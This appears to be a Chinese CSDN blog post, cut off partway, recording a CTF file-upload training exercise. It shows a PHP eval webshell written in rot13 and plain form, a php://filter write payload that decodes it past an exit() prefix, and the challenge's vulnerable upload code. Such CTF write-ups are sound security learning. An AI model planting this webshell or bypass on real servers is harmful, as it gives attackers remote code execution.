8月1日CTF文件上传训练

本文详细介绍了CTF比赛中常见的文件上传漏洞利用技巧,包括伪协议上传、.user.ini文件包含上传和.htaccess文件包含上传。通过实例演示了上传测试、添加ini和htaccess文件的步骤,并强调了一句话木马的正确编写和上传顺序的重要性。
摘要由CSDN通过智能技术生成

题记:
满足于只做出一道题的今天

一、伪协议上传

题目:
在这里插入图片描述
思路:
代码表示需要使用伪协议上传,且不能用base64
dir=php://filter/write=string.rot13/resource=file.php
制作rot13cmd.php
内容:

<?cuc @riny($_CBFG['pzq']);?>
//<?php @eval($_POST['cmd']);?>的rot13编码

在dir处写payload:

php://filter/write=string.rot13/resource=upload/rot13cmd.php
//主要两点,一是上传文件名可以选择与上传文件同名,二是upload文件路径是注释提醒和自己测试出来的

步骤一:上传测试

if (strstr($dir, 'base')) {
        die("not use base");
    }
    @file_put_contents($dir, '<?php exit();?>'.file_get_contents($_FILES['file']['tmp_name']));
   /
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值